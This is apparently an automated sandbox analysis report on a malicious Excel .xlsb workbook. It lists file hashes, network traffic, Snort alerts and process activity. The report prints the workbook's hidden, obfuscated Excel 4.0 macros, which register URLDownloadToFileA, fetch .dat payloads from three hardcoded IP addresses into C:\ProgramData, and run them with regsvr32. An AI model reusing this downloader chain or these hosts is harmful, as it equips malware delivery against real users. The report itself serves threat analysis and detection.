                                                                                                                                                  • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                                                                                                  • ZIP compressed archive (8000/1) 5.73%
                                                                                                                                                  File name:Summary-313689350-Feb-15.xlsb
                                                                                                                                                  File size:270134
                                                                                                                                                  MD5:494a7ce828bec65273a9b49cefea91d7
                                                                                                                                                  SHA1:dfab2f0d4759820ef1a769bbaa2d79b64218b7c9
                                                                                                                                                  SHA256:e0b0146bdaabe240d92056c5b211e0b2d858f81aade2e06ca28f59bc2a229bed
                                                                                                                                                  SHA512:6a82cb5eb51ba23303cb1519554cfac26a14dac0b693438d68eec1fd69d04148df6b5c402a2094f72ab95b590e68ff41e784566a1476eb8b4466f8094b60654c
                                                                                                                                                  SSDEEP:6144:/VafQTxwGF4p24e6RoPmj6M7R6SFENKq4Wneb:tacxGgF62PFNJnq
                                                                                                                                                  File Content Preview:PK..........!.........=.......[Content_Types].xml ...(...............................................................................................................................................................................II........................
                                                                                                                                                  Icon Hash:74f0d0d2c6d6d0f4
                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1
                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:
                                                                                                                                                  Name:Tiposa1111
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa11114False0Falsepre21,5,=EXEC("regsvr32 C:\ProgramData\Hroser2.ocx")23,5,=GOTO(Tiposa11111!E10)
                                                                                                                                                  Name:Tiposa
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa3False0Falsepre1,1,adfvga5eyaey4,9,345434,12,435,2,uiytnkkb65sisk5,9,75,14,436,14,367,0,ug7,1,strysrtyy8,1,yystrystry8,9,348,10,59,1,strstr9,16,34610,7,kd658d6imiyi10,8,34510,9,u11,2,srtusrt11,7,dkkkkt11,11,511,12,3512,1,srttatu12,2,srtuus12,9,r6713,1,ry13,2,yusruysrtuy13,7,65f8d6k8s13,10,713,14,3413,15,54314,0,uh14,1,tshhfthrs15,0,715,4,URLDownloadTo15,7,ycifyiy,fi15,10,ae4616,2,ru6u17,9,dt17,10,617,12,u17,13,518,8,yu18,10,sb18,14,519,3,JJCCBB19,7,tyinz20,0,720,1,tsyshary20,4,185.141.26.236/20,7,aerf644yvac5y20,8,u21,0,md21,3,121,4,185.252.215.41/21,9,s21,11,m22,1,rh22,3,922,4,188.165.62.32/22,8,623,4,423,11,423,15,4624,4,524,6,=GOTO(Vtreytr!F17)24,8,2324,14,624,15,4325,1,bysrthshtd25,4,625,10,2325,13,526,1,dghgfh28,2,hdhstys37,6,=GOTO(Tiposa1!G8)
                                                                                                                                                  Name:Tiposa3
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa34False0Falsepre14,7,=GOTO(Detr!K18)
                                                                                                                                                  Name:Tiposa6
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa64False0Falsepre19,7,=GOTO(Tiposa2!H20)
                                                                                                                                                  Name:Detr
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Detr4False0Falsepost25,10,=GOTO(Xwtrd!G18)
                                                                                                                                                  Name:Detr
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Detr4False0Falsepre25,10,=GOTO(Xwtrd!G18)
                                                                                                                                                  Name:Tiposa2
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa24False0Falsepre14,7,=GOTO(Tiposa6!H10)21,7,=GOTO(Tiposa1!G21)28,7,=GOTO(Tiposa1!G29)
                                                                                                                                                  Name:Vtreytr
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Vtreytr4False0Falsepost21,5,=REGISTER("uRlMon",Fola&"FileA","JJCCBB","Drwrgdfghfhf",,"1","9")24,5,=GOTO(Tiposa!G34)
                                                                                                                                                  Name:Vtreytr
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Vtreytr4False0Falsepre21,5,=REGISTER("uRlMon",Fola&"FileA","JJCCBB","Drwrgdfghfhf",,"1","9")24,5,=GOTO(Tiposa!G34)
                                                                                                                                                  Name:Xwtrd2
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrd23False0Falsepost16,5,=Drwrgdfghfhf(0,"http://188.165.62.32/5679372910751440.dat","C:\ProgramData\Hroser3.ocx",0,0)19,5,=GOTO(Xwtrd!G24)
                                                                                                                                                  Name:Xwtrdferyy
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrdferyy3False0Falsepre13,3,=Drwrgdfghfhf(0,"http://185.252.215.41/7332413132139490.dat","C:\ProgramData\Hroser2.ocx",0,0)16,3,=GOTO(Xwtrd2!F14)
                                                                                                                                                  Name:Tiposa11111
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa111114False0Falsepre11,4,=EXEC("regsvr32 C:\ProgramData\Hroser3.ocx")13,4,=GOTO(Tiposa1!G25)
                                                                                                                                                  Name:Tiposa11111
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa111114False0Falsepost11,4,=EXEC("regsvr32 C:\ProgramData\Hroser3.ocx")13,4,=GOTO(Tiposa1!G25)
                                                                                                                                                  Name:Xwtrd
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrd3False0Falsepost20,6,=Drwrgdfghfhf(0,"http://185.141.26.236/5679372910751440.dat","C:\ProgramData\Hroser1.ocx",0,0)21,6,=GOTO(Xwtrdferyy!D11)25,6,=GOTO(Tiposa2!H13)
                                                                                                                                                  Name:Xwtrd
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrd3False0Falsepre20,6,=Drwrgdfghfhf(0,"http://185.141.26.236/7332413132139490.dat","C:\ProgramData\Hroser1.ocx",0,0)21,6,=GOTO(Xwtrdferyy!D11)25,6,=GOTO(Tiposa2!H13)
                                                                                                                                                  Name:Tiposa3
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa34False0Falsepost14,7,=GOTO(Detr!K18)
                                                                                                                                                  Name:Tiposa1
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa14False0Falsepost10,6,=RANDBETWEEN(213214234,9776980793567560)13,4,="C:\ProgramDat"18,4,=T(E20&E21)18,6,=GOTO(Tiposa3!H8)19,4,re20,4,gs21,6,=EXEC(E19&"vr32  "&E14&"a\Hroser1.ocx")22,6,=GOTO(Tiposa1111!F20)25,6,=GOTO(Tiposa2!H24)29,6,=RETURN()
                                                                                                                                                  Name:Tiposa
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa3False0Falsepost1,1,adfvga5eyaey4,9,345434,12,435,2,uiytnkkb65sisk5,9,75,14,436,14,367,0,ug7,1,strysrtyy8,1,yystrystry8,9,348,10,59,1,strstr9,16,34610,7,kd658d6imiyi10,8,34510,9,u11,2,srtusrt11,7,dkkkkt11,11,511,12,3512,1,srttatu12,2,srtuus12,9,r6713,1,ry13,2,yusruysrtuy13,7,65f8d6k8s13,10,713,14,3413,15,54314,0,uh14,1,tshhfthrs15,0,715,4,URLDownloadTo15,7,ycifyiy,fi15,10,ae4616,2,ru6u17,9,dt17,10,617,12,u17,13,518,8,yu18,10,sb18,14,519,3,JJCCBB19,7,tyinz20,0,720,1,tsyshary20,4,185.141.26.236/20,7,aerf644yvac5y20,8,u21,0,md21,3,121,4,185.252.215.41/21,9,s21,11,m22,1,rh22,3,922,4,188.165.62.32/22,8,623,4,423,11,423,15,4624,4,524,6,=GOTO(Vtreytr!F17)24,8,2324,14,624,15,4325,1,bysrthshtd25,4,625,10,2325,13,526,1,dghgfh28,2,hdhstys37,6,=GOTO(Tiposa1!G8)
                                                                                                                                                  Name:Tiposa6
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa64False0Falsepost19,7,=GOTO(Tiposa2!H20)
                                                                                                                                                  Name:Xwtrd2
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrd23False0Falsepre16,5,=Drwrgdfghfhf(0,"http://188.165.62.32/7332413132139490.dat","C:\ProgramData\Hroser3.ocx",0,0)19,5,=GOTO(Xwtrd!G24)
                                                                                                                                                  Name:Tiposa2
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa24False0Falsepost14,7,=GOTO(Tiposa6!H10)21,7,=GOTO(Tiposa1!G21)28,7,=GOTO(Tiposa1!G29)
                                                                                                                                                  Name:Xwtrdferyy
                                                                                                                                                  Type:3
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Xwtrdferyy3False0Falsepost13,3,=Drwrgdfghfhf(0,"http://185.252.215.41/5679372910751440.dat","C:\ProgramData\Hroser2.ocx",0,0)16,3,=GOTO(Xwtrd2!F14)
                                                                                                                                                  Name:Tiposa1
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa14False0Falsepre10,6,=RANDBETWEEN(213214234,9776980793567560)13,4,="C:\ProgramDat"18,4,=T(E20&E21)18,6,=GOTO(Tiposa3!H8)19,4,re20,4,gs21,6,=EXEC(E19&"vr32  "&E14&"a\Hroser1.ocx")22,6,=GOTO(Tiposa1111!F20)25,6,=GOTO(Tiposa2!H24)29,6,=RETURN()
                                                                                                                                                  Name:Tiposa1111
                                                                                                                                                  Type:4
                                                                                                                                                  Final:False
                                                                                                                                                  Visible:False
                                                                                                                                                  Protected:False
                                                                                                                                                  Tiposa11114False0Falsepost21,5,=EXEC("regsvr32 C:\ProgramData\Hroser2.ocx")23,5,=GOTO(Tiposa11111!E10)
                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  02/15/22-22:54:57.086061TCP1201ATTACK-RESPONSES 403 Forbidden8049165185.141.26.236192.168.2.22
                                                                                                                                                  02/15/22-22:54:57.253675TCP1201ATTACK-RESPONSES 403 Forbidden8049166185.252.215.41192.168.2.22
                                                                                                                                                  02/15/22-22:54:57.471397TCP1201ATTACK-RESPONSES 403 Forbidden8049167188.165.62.32192.168.2.22
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Feb 15, 2022 23:00:24.396289110 CET4976080192.168.2.3185.141.26.236
                                                                                                                                                  Feb 15, 2022 23:00:24.436024904 CET8049760185.141.26.236192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:00:24.436547995 CET4976080192.168.2.3185.141.26.236
                                                                                                                                                  Feb 15, 2022 23:00:24.437271118 CET4976080192.168.2.3185.141.26.236
                                                                                                                                                  Feb 15, 2022 23:00:24.477032900 CET8049760185.141.26.236192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:00:24.692672968 CET8049760185.141.26.236192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:00:24.692804098 CET4976080192.168.2.3185.141.26.236
                                                                                                                                                  Feb 15, 2022 23:00:24.714498043 CET4976180192.168.2.3185.252.215.41
                                                                                                                                                  Feb 15, 2022 23:00:24.736835003 CET8049761185.252.215.41192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:00:24.737025976 CET4976180192.168.2.3185.252.215.41
                                                                                                                                                  Feb 15, 2022 23:00:24.737411976 CET4976180192.168.2.3185.252.215.41
                                                                                                                                                  Feb 15, 2022 23:00:24.759469032 CET8049761185.252.215.41192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:00:24.864757061 CET8049761185.252.215.41192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:00:24.865384102 CET4976180192.168.2.3185.252.215.41
                                                                                                                                                  Feb 15, 2022 23:00:24.871758938 CET4976280192.168.2.3188.165.62.32
                                                                                                                                                  Feb 15, 2022 23:00:24.898929119 CET8049762188.165.62.32192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:00:24.899051905 CET4976280192.168.2.3188.165.62.32
                                                                                                                                                  Feb 15, 2022 23:00:24.899504900 CET4976280192.168.2.3188.165.62.32
                                                                                                                                                  Feb 15, 2022 23:00:24.926546097 CET8049762188.165.62.32192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:00:25.098505020 CET8049762188.165.62.32192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:00:25.098855019 CET4976280192.168.2.3188.165.62.32
                                                                                                                                                  Feb 15, 2022 23:01:29.699080944 CET8049760185.141.26.236192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:01:29.699316978 CET4976080192.168.2.3185.141.26.236
                                                                                                                                                  Feb 15, 2022 23:01:29.866833925 CET8049761185.252.215.41192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:01:29.866955996 CET4976180192.168.2.3185.252.215.41
                                                                                                                                                  Feb 15, 2022 23:01:30.104300022 CET8049762188.165.62.32192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:01:30.104480028 CET4976280192.168.2.3188.165.62.32
                                                                                                                                                  Feb 15, 2022 23:02:09.112168074 CET4976280192.168.2.3188.165.62.32
                                                                                                                                                  Feb 15, 2022 23:02:09.112435102 CET4976180192.168.2.3185.252.215.41
                                                                                                                                                  Feb 15, 2022 23:02:09.112571001 CET4976080192.168.2.3185.141.26.236
                                                                                                                                                  Feb 15, 2022 23:02:09.134706974 CET8049761185.252.215.41192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:02:09.139508009 CET8049762188.165.62.32192.168.2.3
                                                                                                                                                  Feb 15, 2022 23:02:09.152005911 CET8049760185.141.26.236192.168.2.3
                                                                                                                                                  • 185.141.26.236
                                                                                                                                                  • 185.252.215.41
                                                                                                                                                  • 188.165.62.32
                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.349760185.141.26.23680C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 15, 2022 23:00:24.437271118 CET1181OUTGET /5679372910751440.dat HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 185.141.26.236
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 15, 2022 23:00:24.692672968 CET1182INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 15 Feb 2022 22:01:05 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.349761185.252.215.4180C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 15, 2022 23:00:24.737411976 CET1182OUTGET /5679372910751440.dat HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 185.252.215.41
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 15, 2022 23:00:24.864757061 CET1183INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 15 Feb 2022 22:00:24 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.349762188.165.62.3280C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Feb 15, 2022 23:00:24.899504900 CET1184OUTGET /5679372910751440.dat HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 188.165.62.32
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Feb 15, 2022 23:00:25.098505020 CET1184INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 15 Feb 2022 22:00:25 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:23:00:17
                                                                                                                                                  Start date:15/02/2022
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                  Imagebase:0x150000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:23:00:24
                                                                                                                                                  Start date:15/02/2022
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 C:\ProgramData\Hroser1.ocx
                                                                                                                                                  Imagebase:0x80000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:23:00:25
                                                                                                                                                  Start date:15/02/2022
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 C:\ProgramData\Hroser2.ocx
